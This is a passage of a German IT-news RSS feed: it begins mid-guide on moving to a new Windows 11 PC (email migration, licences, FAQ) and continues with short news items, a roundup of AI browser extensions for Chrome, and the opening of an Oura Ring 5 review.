<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d7007"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Mailstore-Home-export-IMAP-Konto.png" alt="Mailstore Home export IMAP-Konto" class="wp-image-3178966" width="1024" height="574" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Aufwendiger wird es, wenn Sie Ihre Mails bisher per POP3 abrufen. In diesem Fall liegen viele Nachrichten oft nur lokal auf dem alten Rechner. Dann sollten Sie das Postfach vor dem Wechsel sichern. Dafür eignet sich etwa <a href="https://www.pcwelt.de/article/1143948/e-mails-verwalten-mailstore-home.html">MailStore Home</a>, das für die private Nutzung kostenlos ist. Das Programm archiviert lokale Mailbestände und kann sie anschließend wieder exportieren.</p>



<p>Erstellen Sie zunächst auf dem alten PC mit MailStore Home ein Backup Ihres POP3-Postfachs und sichern Sie dieses auf einem externen Datenträger. Auf dem neuen PC installieren Sie Ihr Mailprogramm sowie MailStore Home. Dort laden Sie die Sicherung und exportieren die Nachrichten über „E-Mails exportieren“ in ein IMAP-Postfach.</p>



<p>Damit wandern die bisher nur lokal gespeicherten Mails auf den Server Ihres Providers. Anschließend stehen sie nicht nur auf dem neuen Windows-PC, sondern auch auf Smartphone, Tablet und im Webmailer synchron zur Verfügung. </p>



<p>Der Wechsel von POP3 zu IMAP lohnt sich daher besonders, wenn Sie Ihre E-Mails künftig auf mehreren Geräten nutzen möchten.</p>



<h2 class="wp-block-heading">Vor dem Umzug: Das sollten Sie beachten</h2>



<p>Unabhängig vom gewählten Programm sollten Sie vorab ein vollständiges Backup Ihrer wichtigen Daten auf einem externen Datenträger anlegen. Geht beim Transfer etwas schief, haben Sie eine unabhängige Kopie zur Hand.</p>



<p>Notieren Sie außerdem Lizenzschlüssel kostenpflichtiger Programme. Kostenlose Tools wie <a href="https://www.nirsoft.net/utils/product_cd_key_viewer.html" target="_blank" rel="noreferrer noopener">ProduKey </a>können gespeicherte Produktschlüssel auslesen, ersetzen aber keine vollständige Lizenzverwaltung – prüfen Sie daher zusätzlich die Kundenkonten der jeweiligen Softwareanbieter.</p>



<p>Manche Anwendungen verlangen nach dem Umzug eine erneute Aktivierung. Bei Programmen mit Gerätebindung kann es nötig sein, die Lizenz auf dem alten PC vorher zu deaktivieren oder im Kundenkonto freizugeben.</p>



<p>Bei Microsoft Office hängt der Aufwand von der Lizenz ab. Ein Microsoft-365-Abo oder eine an das Microsoft-Konto gebundene Office-Lizenz richten Sie auf dem neuen PC meist einfach erneut über das Konto ein. Ältere Einzelplatzlizenzen ohne Kontobindung können komplizierter sein.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c8db0d795e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/Office365-Konto-Info.png?w=1200" alt="Office365 Konto-Info" class="wp-image-3178971" width="1200" height="581" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Prüfen Sie überdies, ob alle wichtigen Programme unter Windows 11 laufen. Sehr alte Tools, Spezialsoftware, Treiberpakete, Scanner-Software oder ältere VPN-Clients können Probleme verursachen. Hier ist eine Neuinstallation oft sauberer als eine blinde Übernahme.</p>



<p><strong>Wichtiger Vorab-Tipp:</strong> Deinstallieren Sie auf dem alten PC vor dem Umzug alte Druckertreiber oder tief ins System eingreifende Software (wie Antivirenprogramme von Drittanbietern). Solche Systemkomponenten werden von Umzugsprogrammen manchmal fälschlicherweise mitkopiert und können das neue Windows 11-System instabil machen.</p>



<p>Planen Sie für einen gut gefüllten PC genügend Zeit ein. Je nach Datenmenge dauert die Übertragung von einer bis zu mehreren Stunden.</p>



<p>Nach dem Umzug sollten Sie Windows Update ausführen, Programme starten, Drucker prüfen, Cloud-Synchronisierung kontrollieren und wichtige Dateien stichprobenartig öffnen.</p>



<div class="wp-block-idg-base-theme-faq-block faq-block"><h2 class="faq-block-title"> FAQ </h2><hr class="block-horizotal-divider">
<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">1.</span>
<h3 class="wp-block-heading"><strong>Kann ich Programme einfach vom alten PC auf den neuen kopieren?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Nein, in der Regel reicht das Kopieren des Programmordners nicht aus. Viele Anwendungen legen Einträge in der Windows-Registry an, speichern Lizenzdaten an anderen Stellen oder installieren zusätzliche Komponenten. Deshalb müssen Programme entweder neu installiert oder mit spezieller Umzugssoftware übertragen werden.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">2.</span>
<h3 class="wp-block-heading"><strong>Was ist besser: Umzugssoftware oder Neuinstallation?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Das hängt vom Zustand des alten PCs ab. Ist das System gut gepflegt und sollen viele Programme mitkommen, spart Umzugssoftware viel Zeit. Ist der alte Rechner dagegen über Jahre langsam, unübersichtlich oder fehleranfällig geworden, ist eine saubere Neuinstallation oft die bessere Wahl. Dann übernehmen Sie nur Daten und installieren Programme gezielt neu.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">3.</span>
<h3 class="wp-block-heading"><strong>Werden auch Passwörter und Browserdaten übertragen?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Teilweise. Browserdaten wie Lesezeichen, Verlauf und Erweiterungen lassen sich meist über das jeweilige Browserkonto synchronisieren, etwa bei Edge, Chrome oder Firefox. Gespeicherte Passwörter sollten Sie vor dem Umzug prüfen und am besten zusätzlich in einem Passwortmanager sichern. Verlassen Sie sich nicht ausschließlich darauf, dass eine Umzugssoftware alle Zugangsdaten vollständig übernimmt.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">4.</span>
<h3 class="wp-block-heading"><strong>Muss der alte PC während des Umzugs weiter funktionieren?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Für den direkten Transfer über das Netzwerk ja. Beide Rechner müssen eingeschaltet und erreichbar sein. Alternativ können einige Programme ein Umzugsabbild auf einer externen Festplatte erstellen. Das ist praktisch, wenn der neue PC noch nicht bereitsteht oder der alte Rechner nur noch eingeschränkt nutzbar ist.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">5.</span>
<h3 class="wp-block-heading"><strong>Was sollte ich nach dem Umzug zuerst prüfen?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Starten Sie den neuen PC neu und führen Sie Windows Update aus. Danach sollten Sie wichtige Programme öffnen, Lizenzaktivierungen kontrollieren, Drucker und Scanner testen, Mailkonten prüfen und sicherstellen, dass Cloud-Dienste wie OneDrive vollständig synchronisieren. Öffnen Sie außerdem stichprobenartig wichtige Dokumente, Bilder und Projektordner.</p>
</div>
</div></div>
</div>



<p></p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[1.800 TV-Sender kostenlos, ohne Abo und ohne Anmeldung – mit einer versteckten VLC-Funktion geht das]]></title>
<description><![CDATA[Der VLC Media Player kann weit mehr als Videos abspielen. Ganz schnell wird er zum vollwertigen TV-Center mit 1.800 Sendern.]]></description>
<link>https://tsecurity.de/de/3678914/it-nachrichten/1800-tv-sender-kostenlos-ohne-abo-und-ohne-anmeldung-mit-einer-versteckten-vlc-funktion-geht-das/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678914/it-nachrichten/1800-tv-sender-kostenlos-ohne-abo-und-ohne-anmeldung-mit-einer-versteckten-vlc-funktion-geht-das/</guid>
<pubDate>Sun, 19 Jul 2026 07:32:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der VLC Media Player kann weit mehr als Videos abspielen. Ganz schnell wird er zum vollwertigen TV-Center mit 1.800 Sendern.]]></content:encoded>
</item>
<item>
<title><![CDATA[Frankreich vs. England: So empfangt ihr die Highlights und Tore kostenlos]]></title>
<description><![CDATA[Frankreich und England spielen bei der Fußball-WM 2026 um den Trostpreis, den dritten Platz. Wer das Spiel verpasst haben sollte, kann sich die Begegnung gratis in den Highlights zu Gemüte führen.
																					Dieser Artikel wurde einsortiert unter 
																	ARD,																	Z...]]></description>
<link>https://tsecurity.de/de/3678880/it-nachrichten/frankreich-vs-england-so-empfangt-ihr-die-highlights-und-tore-kostenlos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678880/it-nachrichten/frankreich-vs-england-so-empfangt-ihr-die-highlights-und-tore-kostenlos/</guid>
<pubDate>Sun, 19 Jul 2026 06:47:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Frankreich und England spielen bei der Fußball-WM 2026 um den Trostpreis, den dritten Platz. Wer das Spiel verpasst haben sollte, kann sich die Begegnung gratis in den Highlights zu Gemüte führen.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/tv-sender/ard.html">ARD</a>,																	<a href="https://www.netzwelt.de/tv-sender/zdf.html">ZDF</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/">Internet-Fernsehen</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/live-tv-anbieter/magentatv-index.html">MagentaTV</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-Extensions für Google Chrome]]></title>
<description><![CDATA[Mit Hilfe dieser KI-Extensions peppen Sie Ihr Chrome-Erlebnis auf.
					Foto: Anton27 – IJ-studio – shutterstock.com




Google Chrome ist nicht ohne Grund führend in seinem Bereich. Insbesondere in Verbindung mit den im Übermaß zur Verfügung stehenden Extensions kann der Browser enormes Potenzia...]]></description>
<link>https://tsecurity.de/de/3678837/it-security-nachrichten/ki-extensions-fuer-google-chrome/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678837/it-security-nachrichten/ki-extensions-fuer-google-chrome/</guid>
<pubDate>Sun, 19 Jul 2026 06:07:15 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Mit Hilfe dieser KI-Extensions peppen Sie Ihr Chrome-Erlebnis auf." title="Mit Hilfe dieser KI-Extensions peppen Sie Ihr Chrome-Erlebnis auf." src="https://images.computerwoche.de/bdb/3388833/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Mit Hilfe dieser KI-Extensions peppen Sie Ihr Chrome-Erlebnis auf.</p></figcaption></figure><p class="imageCredit">
					Foto: Anton27 – IJ-studio – shutterstock.com</p></div>




<p class="wp-block-paragraph">Google Chrome ist nicht ohne Grund führend in seinem Bereich. Insbesondere in Verbindung mit den im Übermaß zur Verfügung stehenden <a title="Extensions" href="https://www.computerwoche.de/article/2795842/browser-addons-fuer-bessere-heimarbeit.html" target="_blank">Extensions</a> kann der Browser enormes Potenzial entfalten. Mit Hilfe von Generative AI lässt sich Chrome dabei längst auch um entsprechende Funktionalitäten ergänzen. Das kann nicht nur dem Nutzererlebnis, sondern auch der Accessibility und der Produktivität enorm zuträglich sein.</p>



<p class="wp-block-paragraph">In diesem Artikel stellen wir Ihnen KI-Extensions für Google Chrome vor, die es Wert sind, ausgetestet zu werden.</p>



<h2 class="wp-block-heading"><a href="https://chrome.google.com/webstore/detail/chatgpt-writer-write-mail/pdnenlnelpdomajfejgapbdpmjkfpjkp" target="_blank" rel="noreferrer noopener">Jetwriter AI</a></h2>



<p class="wp-block-paragraph">Es gibt nur wenige Chrome-Erweiterungen, die so viele ChatGPT-Funktionen auf Google Services ermöglichen, wie Jetwriter AI. Das ermöglicht den Benutzern der Chrome-Extension (die dank Chromium-Basis übrigens mit sämtlichen Browsern funktioniert, die das Framework nutzen) zum Beispiel, Ihre Google-Mails automatisiert per KI schreiben, beziehungsweise beantworten zu lassen. Zudem bietet die App universelle Sprachunterstützung.</p>



<p class="wp-block-paragraph"><strong>Pro:</strong></p>



<ul class="wp-block-list">
<li><p>Gmail mit KI nutzen;</p></li>



<li><p>Multi-Language-Support;</p></li>
</ul>



<p class="wp-block-paragraph"><strong>Kontra:</strong></p>



<ul class="wp-block-list">
<li><p>keine zusätzlichen Funktionen;</p></li>
</ul>



<h2 class="wp-block-heading"><a href="https://chrome.google.com/webstore/detail/compose-ai-ai-powered-wri/ddlbpiadoechcolndfeaonajmngmhblj" target="_blank" rel="noreferrer noopener">Compose AI</a></h2>



<p class="wp-block-paragraph">Google Chrome lässt Drittanbieter-Apps ganz generell einige Freiheiten – da bildet auch ChatGPT keine Ausnahme. Diesen Umstand macht sich auch Compose AI zunutze. Diese Extension verspricht automatisierte KI-Textgenerierung in jeder Lebenslage sowie zu jedem Zweck, von der E-Mail bis hin zum Social-Media-Post.</p>



<p class="wp-block-paragraph">Darüber hinaus ist die Browser-Erweiterung auch in der Lage, Vorschläge für Verbesserungen zu machen oder Stichpunkte in Texte zu verwandeln. Der Output, den die Extension liefert, kann sich dabei durchaus sehen lassen. Der Haken an der Sache: Die kostenlose Version weist ein Limit von 1.000 Worten auf.</p>



<p class="wp-block-paragraph"><strong>Pro:</strong></p>



<ul class="wp-block-list">
<li><p>kann vollständige E-Mails schreiben;</p></li>



<li><p>Output direkt nutzbar;</p></li>
</ul>



<p class="wp-block-paragraph"><strong>Kontra:</strong></p>



<ul class="wp-block-list">
<li><p>kostenlose Version stark eingeschränkt;</p></li>
</ul>



<h2 class="wp-block-heading"><a href="https://hix.ai/browser-extension" target="_blank" rel="noreferrer noopener">HIX.AI</a></h2>



<p class="wp-block-paragraph">Die Chrome-Erweiterung HIX.AI präsentiert sich vielseitig und kann ihre Nutzer insbesondere weiterbringen, wenn es um automatisierte Texterstellung geht. Die Extension kann beispielsweise Inhalte in Google Docs erstellen, Posts auf Facebook, X und anderen sozialen Kanälen absetzen oder auch E-Mails beantworten. Darüber hinaus durchforstet HIX.AI aber auch die Suchergebnisseiten von Google und findet so zielstrebig relevante Antworten auf praktisch jede Frage. Diese Extension bietet auch eine Alternative zur KI-basierten Bing-Seitenleiste. Insofern ist HIX.AI eine Art vollständige KI-Suite für Chrome.</p>



<p class="wp-block-paragraph"><strong>Pro:</strong></p>



<ul class="wp-block-list">
<li><p>Texte, E-Mails und Social Postings verfassen, bearbeiten, übersetzen etc.;</p></li>



<li><p>einfache Aktivierung;</p></li>



<li><p>auch mit Edge kompatibel;</p></li>
</ul>



<p class="wp-block-paragraph"><strong>Kontra:</strong></p>



<ul class="wp-block-list">
<li><p>kein Offline-Modus;</p></li>
</ul>



<h2 class="wp-block-heading"><a href="https://chrome.google.com/webstore/detail/merlin-1-click-access-to/camppjleccjaphfdbohjdohecfnoikec" target="_blank" rel="noreferrer noopener">Merlin</a></h2>



<p class="wp-block-paragraph">Auch Merlin bringt eine ganze Fülle von KI-Funktionalitäten in Ihren Browser und unterstützt neben GPT auch weitere LLMs wie Claude und Llama. Mit Hilfe der Extension können Sie chatten, E-Mails schreiben, das Internet durchsuchen, Social-Media-Posts genereren, Videos und PDFs zusammenfassen und sogar Text-to-Image-Funktionen nutzen.</p>



<p class="wp-block-paragraph">Diese Chrome-Erweiterung verspricht, Ihren Browser in ein universelles KI-Tool zu verwandeln. Dabei erfordert die Nutzung weder ein OpenAI-Konto, noch ein kostenpflichtiges Abo. Die Gratis-Version weist mit 51 Abfragen pro Tag zudem ein relativ großzügiges Limit auf.</p>



<p class="wp-block-paragraph"><strong>Pro:</strong></p>



<ul class="wp-block-list">
<li><p>umfangreiche KI- beziehungsweise ChatGPT-Funktionen;</p></li>



<li><p>kein OpenAI-Account notwendig;</p></li>



<li><p>kostenlos nutzbar;</p></li>
</ul>



<p class="wp-block-paragraph"><strong>Kontra:</strong></p>



<ul class="wp-block-list">
<li><p>kann Slowdowns verursachen;</p></li>
</ul>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tomorrowland heute im Live-Stream: Hier seht ihr David Guetta, Calvin Harris & Co. heute völlig kostenlos]]></title>
<description><![CDATA[Hier könnt ihr direkt zur Mainstage einschalten:]]></description>
<link>https://tsecurity.de/de/3678069/it-nachrichten/tomorrowland-heute-im-live-stream-hier-seht-ihr-david-guetta-calvin-harris-co-heute-voellig-kostenlos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678069/it-nachrichten/tomorrowland-heute-im-live-stream-hier-seht-ihr-david-guetta-calvin-harris-co-heute-voellig-kostenlos/</guid>
<pubDate>Sat, 18 Jul 2026 15:32:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hier könnt ihr direkt zur Mainstage einschalten:]]></content:encoded>
</item>
<item>
<title><![CDATA[Nothing Phone (4b) im Test: Das neue Einsteiger-Handy von Nothing ist nicht schlecht, aber…]]></title>
<description><![CDATA[Das Phone (4b) ist das neue Einstiegsmodell von Nothing. Im Grunde macht das Smartphone nicht viel falsch und es könnte auch beim Preis punkten, wäre da nicht ein anderes Nothing-Phone.
																					Dieser Artikel wurde einsortiert unter 
																	Kaufberatung,																	And...]]></description>
<link>https://tsecurity.de/de/3677772/it-nachrichten/nothing-phone-4b-im-test-das-neue-einsteiger-handy-von-nothing-ist-nicht-schlecht-aber/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677772/it-nachrichten/nothing-phone-4b-im-test-das-neue-einsteiger-handy-von-nothing-ist-nicht-schlecht-aber/</guid>
<pubDate>Sat, 18 Jul 2026 11:33:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Phone (4b) ist das neue Einstiegsmodell von Nothing. Im Grunde macht das Smartphone nicht viel falsch und es könnte auch beim Preis punkten, wäre da nicht ein anderes Nothing-Phone.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/testberichte/index.html">Kaufberatung</a>,																	<a href="https://www.netzwelt.de/download/8900-android-kostenlos.html">Android</a>,																	<a href="https://www.netzwelt.de/smartphone/index.html">Smartphone</a>,																	<a href="https://www.netzwelt.de/technology/index.html">Technology</a>,																	<a href="https://www.netzwelt.de/smartphone/">Nothing Phone (4b)</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Vorsicht beim Formel-1-Merch: Warum Fans beim Online-Kauf genau hinsehen sollten]]></title>
<description><![CDATA[Wo die Nachfrage nach Formel-1-Merch steigt, sind auch Betrüger nicht weit. Wir zeigen, wie Fake-Shops zur Datenfalle werden können und wie ihr euch mit Bitdefender schützt.
																					Dieser Artikel wurde einsortiert unter 
																	Bitdefender,																	Ratgeber: Sicher...]]></description>
<link>https://tsecurity.de/de/3677539/it-nachrichten/vorsicht-beim-formel-1-merch-warum-fans-beim-online-kauf-genau-hinsehen-sollten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677539/it-nachrichten/vorsicht-beim-formel-1-merch-warum-fans-beim-online-kauf-genau-hinsehen-sollten/</guid>
<pubDate>Sat, 18 Jul 2026 08:18:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wo die Nachfrage nach Formel-1-Merch steigt, sind auch Betrüger nicht weit. Wir zeigen, wie Fake-Shops zur Datenfalle werden können und wie ihr euch mit Bitdefender schützt.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/download/18696-bitdefender-virus-scanner-kostenlos.html">Bitdefender</a>,																	<a href="https://www.netzwelt.de/">Ratgeber: Sicherheit</a>,																	<a href="https://www.netzwelt.de/hersteller/index.html">Hersteller</a>,																	<a href="https://www.netzwelt.de/download/sicherheit/index.html">Sicherheit</a>,																	<a href="https://www.netzwelt.de/antivirus/">Antivirenprogramme</a>,																	<a href="https://www.netzwelt.de/datenloeschdienste/index.html">Datenlöschdienste</a>,																	<a href="https://www.netzwelt.de/antivirus/">Antivirenprogramme im Vergleich: Welcher Dienst schützt wirklich?</a>,																	<a href="https://www.netzwelt.de/antivirus/">Bitdefender Ultimate Security</a>,																	<a href="https://www.netzwelt.de/antivirus/bitdefender-free-testbericht.html">Bitdefender Antivirus Free</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Projektmanagement ohne US-Tech: 4 starke gratis Alternativen aus Europa]]></title>
<description><![CDATA[Der Markt für Projektmanagement-Tools wird von US-Firmen dominiert. Wir zeigen euch drei Alternativen aus Europa und ein Offline-Tool für Freelancer und kleine weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3677470/it-nachrichten/projektmanagement-ohne-us-tech-4-starke-gratis-alternativen-aus-europa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677470/it-nachrichten/projektmanagement-ohne-us-tech-4-starke-gratis-alternativen-aus-europa/</guid>
<pubDate>Sat, 18 Jul 2026 07:17:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Markt für Projektmanagement-Tools wird von US-Firmen dominiert. Wir zeigen euch drei Alternativen aus Europa und ein Offline-Tool für Freelancer und kleine <a href="https://t3n.de/news/projektmanagement-alternativen-us-tech-europa-kostenlos-1726731/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Oura Ring 5 im Test: Ein Durchbruch bei den Smart-Ringen]]></title>
<description><![CDATA[Mike Sawh



Auf einen Blick



Pro




Unglaublich schlank und leicht



Verbesserte Akkulaufzeit



Verarbeitungsqualität und Farbauswahl



Die Begleit-App ist nach wie vor die beste




Kontra




leichte Preiserhöhung



Erfordert ein Abonnement




Fazit



Der Oura Ring 5 ist der elegantes...]]></description>
<link>https://tsecurity.de/de/3677423/it-security-nachrichten/oura-ring-5-im-test-ein-durchbruch-bei-den-smart-ringen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677423/it-security-nachrichten/oura-ring-5-im-test-ein-durchbruch-bei-den-smart-ringen/</guid>
<pubDate>Sat, 18 Jul 2026 06:07:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.08.02.png?w=1024" alt="Oura Ring 5" class="wp-image-4197758" width="1024" height="582" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<h2 class="wp-block-heading">Auf einen Blick</h2>



<h3 class="wp-block-heading">Pro</h3>



<ul class="wp-block-list">
<li>Unglaublich schlank und leicht</li>



<li>Verbesserte Akkulaufzeit</li>



<li>Verarbeitungsqualität und Farbauswahl</li>



<li>Die Begleit-App ist nach wie vor die beste</li>
</ul>



<h3 class="wp-block-heading">Kontra</h3>



<ul class="wp-block-list">
<li>leichte Preiserhöhung</li>



<li>Erfordert ein Abonnement</li>
</ul>



<h3 class="wp-block-heading">Fazit</h3>



<p class="wp-block-paragraph">Der Oura Ring 5 ist der eleganteste und unauffälligste Smart-Ring, den Sie tragen können, und wird von einer der besten Begleit-Apps der Branche unterstützt. Für diejenigen, die mit dem Aussehen und der Haptik des nach wie vor großartigen Oura Ring 4 zufrieden sind, ist er aber kein unbedingt notwendiges Upgrade.</p>



<p class="wp-block-paragraph">Der Oura Ring 5 ist ein überraschendes Update des besten Smart-Rings auf dem Markt. Alle Gerüchte deuteten auf einen Release gegen Ende 2027 hin, doch Oura überraschte alle, indem das Unternehmen sein neues Modell über ein Jahr früher auf den Markt brachte.</p>



<p class="wp-block-paragraph">Für den Ring 5 ist das Ziel klar: die Hardware des Smart-Rings noch kleiner zu gestalten, ohne dabei Kompromisse bei der Leistung – einschließlich der Akkulaufzeit – einzugehen.</p>



<p class="wp-block-paragraph">Ich bin seit Langem Nutzer des Oura-Rings und habe auch so gut wie alle seine Konkurrenten getestet. Hat der Oura Ring 5 mehr zu bieten als nur ein kleineres Design? Um das herauszufinden, trage ich ihn nun seit fast einem Monat.</p>



<h2 class="wp-block-heading">Design &amp; Verarbeitung</h2>



<ul class="wp-block-list">
<li>40 Prozent kleineres Design</li>



<li>Mit einer kratzfesteren Beschichtung</li>



<li>In 6 Farben erhältlich</li>
</ul>



<p class="wp-block-paragraph">Die wichtigste Neuigkeit ist, dass der Oura Ring 5 kleiner ist als <a href="https://www.pcwelt.de/article/2618869/oura-ring-4-im-test.html" target="_blank">der Oura Ring 4</a>. Er ist um 40 Prozent kleiner – das ist also nicht nur eine geringfügige Verkleinerung, und der Unterschied ist noch deutlicher, wenn man ihn mit dem klobigen <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html#" target="_blank">Oura Ring 4 Ceramic Edition</a> vergleicht.</p>



<p class="wp-block-paragraph">Kleiner bedeutet auch leichter: Das Gewicht ist von 3,3–5,2 Gramm (je nach benötigter Größe) auf nur noch 2 Gramm beim leichtesten Ring 5 gesunken. Die Breite hat sich von 7,9 Millimetern auf 6,09 Millimeter verringert, der Ring ist also schon einmal schlanker.</p>



<p class="wp-block-paragraph">Ich habe den Ring 5 neben die Standard- und Keramik-Versionen des Oura Ring 4 sowie eine Reihe anderer Smart-Ringe gelegt. Sie können sofort erkennen, wie sehr der Ring 5 an der Hand weniger auffällt als frühere Modelle und die Konkurrenzprodukte.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-16-um-13.08.11.png?w=1024" alt="Oura Ring 5" class="wp-image-4197759" width="1024" height="570" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Trotz der deutlich geringeren Dicke blieb meine Ringgröße dieselbe wie bei den bisherigen Oura-Modellen. Ich konnte dennoch eine gute Passform erzielen, sodass der Ring nicht zu sehr am Finger hin- und herrutschte.</p>



<p class="wp-block-paragraph">Der Ring besteht nach wie vor aus Titan, sodass Sie ein Produkt erhalten, das leicht und dennoch strapazierfähig ist. Derzeit ist nur ein Titanmodell erhältlich, sodass diejenigen, die auf einen Oura Ring 5 in Keramik hoffen, vorerst leer ausgehen – allerdings könnte ein solches Modell in Zukunft auf den Markt kommen.</p>



